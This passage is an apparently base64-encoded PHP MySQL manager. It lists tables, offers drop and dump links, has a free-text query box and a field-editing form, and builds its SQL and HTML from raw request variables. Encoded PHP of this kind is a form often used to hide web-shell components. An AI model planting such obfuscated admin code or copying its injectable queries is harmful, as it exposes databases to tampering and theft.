gdmFsdWU9Y3JlYXRlVGFibGU+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9dGFibGVuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBUYWJsZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9cXVlcnk+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IHNpemU9MTIwIG5hbWU9cXVlcnlTdHI+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nUXVlcnknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBUYWJsZSA9IG15c3FsX2xpc3RfdGFibGVzKCAkZGJuYW1lICk7DQoJaWYoICRwVGFibGUgPT0gMCApIHsNCgkJJG1zZyAgPSBteXNxbF9lcnJvcigpOw0KCQllY2hvICI8aDM+RXJyb3IgOiAkbXNnPC9oMz48cD5cbiI7DQoJCXJldHVybjsNCgl9DQoJJG51bSA9IG15c3FsX251bV9yb3dzKCAkcFRhYmxlICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJHRhYmxlbmFtZSA9IG15c3FsX3RhYmxlbmFtZSggJHBUYWJsZSwgJGkgKTsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiJHRhYmxlbmFtZVxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5EYXRhPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5Ecm9wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHVtcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0R1bXAgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5EdW1wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPiI7DQp9DQoNCmZ1bmN0aW9uIGNyZWF0ZVRhYmxlKCkgew0KDQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkNSRUFURSBUQUJMRSAkdGFibGVuYW1lICggbm8gSU5UICkiOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbXlzcWxfcXVlcnkoICRxdWVyeVN0ciwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJbGlzdFRhYmxlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wVGFibGUoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkRST1AgVEFCTEUgJHRhYmxlbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCglsaXN0VGFibGVzKCk7DQp9DQoNCmZ1bmN0aW9uIHZpZXdTY2hlbWEoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJZWNobyAiPGgxPlRhYmxlIFNjaGVtYTwvaDE+XG4iOw0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvUXVlcnlSZXN1bHQoKTsNCgllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWFkZEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRmllbGQ8L2E+IHwgXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5WaWV3IERhdGE8L2E+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgIlNIT1cgZmllbGRzIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+RmllbGQ8L3RoPlxuIjsNCgllY2hvICI8dGg+VHlwZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5OdWxsPC90aD5cbiI7DQoJZWNobyAiPHRoPktleTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5EZWZhdWx0PC90aD5cbiI7DQoJZWNobyAiPHRoPkV4dHJhPC90aD5cbiI7DQoJZWNobyAiPHRoIGNvbHNwYW49Mj5BY3Rpb248L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCg0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2FycmF5KCAkcFJlc3VsdCApOw0KCQllY2hvICI8dHI+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIkZpZWxkIl0uIjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIlR5cGUiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiTnVsbCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJLZXkiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiRGVmYXVsdCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJFeHRyYSJdLiI8L3RkPlxuIjsNCgkJJGZpZWxkbmFtZSA9ICRmaWVsZFsiRmllbGQiXTsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZWRpdEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJmZpZWxkbmFtZT0kZmllbGRuYW1lJz5FZGl0PC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kcm9wRmllbGQmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmZmllbGRuYW1lPSRmaWVsZG5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHJvcCBGaWVsZCBcJyRmaWVsZG5hbWVcJz8nKVwiPkRyb3A8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbWFuYWdlRmllbGQoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBGaWVsZDwvaDE+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aDE+RWRpdCBGaWVsZDwvaDE+XG4iOw0KCQkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCQkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCQkkZmllbGQgPSBteXNxbF9mZXRjaF9hcnJheSggJHBSZXN1bHQgKTsNCgkJCWlmKCAkZmllbGRbIkZpZWxkIl0gPT0gJGZpZWxkbmFtZSApIHsNCgkJCQkkZmllbGR0eXBlID0gJGZpZWxkWyJUeXBlIl07DQoJCQkJJGZpZWxka2V5ID0gJGZpZWxkWyJLZXkiXTsNCgkJCQkkZmllbGRleHRyYSA9ICRmaWVsZFsiRXh0cmEiXTsNCgkJCQkkZmllbGRudWxsID0gJGZpZWxkWyJOdWxsIl07DQoJCQkJJGZpZWxkZGVmYXVsdCA9ICRmaWVsZFsiRGVmYXVsdCJdOw0KCQkJCWJyZWFrOw0KCQkJfQ0KCQl9DQoNCgkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCWlmKCBzdHJwb3MoICRmaWVsZHR5cGUsICIoIiApICkgew0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCSR2YWx1ZWxpc3QgPSBzdHJ0b2soICIgKClcbiIgKTsNCgkJCX0gZWxzZSB7DQoJCQkJJE0gPSBzdHJ0b2soICIgKCwpXG4iICk7DQoJCQkJaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgIiwiICkgKQ0KCQkJCQkkRCA9IHN0cnRvayggIiAoLClcbiIgKTsNCgkJCX0NCgkJfQ0KCX0NCg0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JFBIUF9TRUxGPlxuIjsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1hZGRGaWVsZF9zdWJtaXQ+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9ZWRpdEZpZWxkX3N1Ym1pdD5cbiI7DQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPW9sZF9uYW1lIHZhbHVlPSRmaWVsZG5hbWU+XG4iOw0KCX0NCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1kYm5hbWUgdmFsdWU9JGRibmFtZT5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9dGFibGVuYW1lIHZhbHVlPSR0YWJsZW5hbWU+XG4iOw0KCWVjaG8gIjxoMz5OYW1lPC9oMz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBuYW1lPW5hbWUgdmFsdWU9JGZpZWxkbmFtZT48cD5cbiI7DQoJZWNobyAnDQoNCjxoMz5UeXBlPC9oMz4NCjxmb250IHNpemU9MiBjbGFzcz0ibmV3Ij4NCiogYE1cJyBpbmRpY2F0ZXMgdGhlIG1heGltdW0gZGlzcGxheSBzaXplLjxicj4NCiogYERcJyBhcHBsaWVzIHRvIGZsb2F0aW5nLXBvaW50IHR5cGVzIGFuZCBpbmRpY2F0ZXMgdGhlIG51bWJlciBvZiBkaWdpdHMgZm9sbG93aW5nIHRoZSBkZWNpbWFsIHBvaW50Ljxicj4NCjwvZm9udD4NCjx0YWJsZT4NCjx0cj4NCjx0aD5UeXBlPC90aD48dGg+Jm5ic3BNJm5ic3A8L3RoPjx0aD4mbmJzcEQmbmJzcDwvdGg+PHRoPnVuc2lnbmVkPC90aD48dGg+emVyb2ZpbGw8L3RoPjx0aD5iaW5hcnk8L3RoPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllJTlQiICc7IGlmKCAkdHlwZSA9PSAidGlueWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElOWUlOVCAoLTEyOCB+IDEyNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iU01BTExJTlQiICc7IGlmKCAkdHlwZSA9PSAic21hbGxpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNNQUxMSU5UICgtMzI3NjggfiAzMjc2Nyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNSU5UIiAnOyBpZiggJHR5cGUgPT0gIm1lZGl1bWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNSU5UICgtODM4ODYwOCB+IDgzODg2MDcpPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IklOVCIgJzsgaWYoICR0eXBlID09ICJpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPklOVCAoLTIxNDc0ODM2NDggfiAyMTQ3NDgzNjQ3KTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJCSUdJTlQiICc7IGlmKCAkdHlwZSA9PSAiYmlnaW50IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CSUdJTlQgKC05MjIzMzcyMDM2ODU0Nzc1ODA4IH4gOTIyMzM3MjAzNjg1NDc3NTgwNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iRkxPQVQiICc7IGlmKCAkdHlwZSA9PSAiZmxvYXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkZMT0FUPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkRPVUJMRSIgJzsgaWYoICR0eXBlID09ICJkb3VibGUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRPVUJMRTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJERUNJTUFMIiAnOyBpZiggJHR5cGUgPT0gImRlY2ltYWwiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRFQ0lNQUwoTlVNRVJJQyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURSIgJzsgaWYoICR0eXBlID09ICJkYXRlIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5EQVRFICgxMDAwLTAxLTAxIH4gOTk5OS0xMi0zMSwgWVlZWS1NTS1ERCk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURVRJTUUiICc7IGlmKCAkdHlwZSA9PSAiZGF0ZXRpbWUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRBVEVUSU1FICgxMDAwLTAxLTAxIDAwOjAwOjAwIH4gOTk5OS0xMi0zMSAyMzo1OTo1OSwgWVlZWS1NTS1ERCBISDpNTTpTUyk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElNRVNUQU1QIiAnOyBpZiggJHR5cGUgPT0gInRpbWVzdGFtcCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRVNUQU1QICgxOTcwLTAxLTAxIDAwOjAwOjAwIH4gMjEwNi4uLiwgWVlZWU1NRERbSEhbTU1bU1NdXV0pPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTUUiICc7IGlmKCAkdHlwZSA9PSAidGltZSIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRSAoLTgzODo1OTo1OSB+IDgzODo1OTo1OSwgSEg6TU06U1MpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IllFQVIiICc7IGlmKCAkdHlwZSA9PSAieWVhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+WUVBUiAoMTkwMSB+IDIxNTUsIDAwMDAsIFlZWVkpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkNIQVIiICc7IGlmKCAkdHlwZSA9PSAiY2hhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+Q0hBUjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJWQVJDSEFSIiAnOyBpZiggJHR5cGUgPT0gInZhcmNoYXIiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlZBUkNIQVI8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElOWVRFWFQiICc7IGlmKCAkdHlwZSA9PSAidGlueXRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRJTllURVhUICgwIH4gMjU1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJURVhUIiAnOyBpZiggJHR5cGUgPT0gInRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRFWFQgKDAgfiA2NTUzNSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNVEVYVCIgJzsgaWYoICR0eXBlID09ICJtZWRpdW10ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5NRURJVU1URVhUICgwIH4gMTY3NzcyMTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkxPTkdURVhUIiAnOyBpZiggJHR5cGUgPT0gImxvbmd0ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5MT05HVEVYVCAoMCB+IDQyOTQ5NjcyOTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllCTE9CIiAnOyBpZiggJHR5cGUgPT0gInRpbnlibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5USU5ZQkxPQiAoMCB+IDI1NSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iQkxPQiIgJzsgaWYoICR0eXBlID09ICJibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CTE9CICgwIH4gNjU1MzUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9Ik1FRElVTUJMT0IiICc7IGlmKCAkdHlwZSA9PSAibWVkaXVtYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNQkxPQiAoMCB+IDE2Nzc3MjE1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJMT05HQkxPQiIgJzsgaWYoICR0eXBlID09ICJsb25nYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TE9OR0JMT0IgKDAgfiA0Mjk0OTY3Mjk1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJFTlVNIiAnOyBpZiggJHR5cGUgPT0gImVudW0iICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkVOVU08L3RkPg0KPHRkIGNvbHNwYW49NT48Y2VudGVyPnZhbHVlIGxpc3Q8L2NlbnRlcj48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlNFVCIgJzsgaWYoICR0eXBlID09ICJzZXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNFVDwvdGQ+DQo8dGQgY29sc3Bhbj01PjxjZW50ZXI+dmFsdWUgbGlzdDwvY2VudGVyPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjx0YWJsZT4NCjx0cj48dGg+TTwvdGg+PHRoPkQ8L3RoPjx0aD51bnNpZ25lZDwvdGg+PHRoPnplcm9maWxsPC90aD48dGg+YmluYXJ5PC90aD48dGg+dmFsdWUgbGlzdCAoZXg6IFwnYXBwbGVcJywgXCdvcmFuZ2VcJywgXCdiYW5hbmFcJykgPC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPU0gJzsgaWYo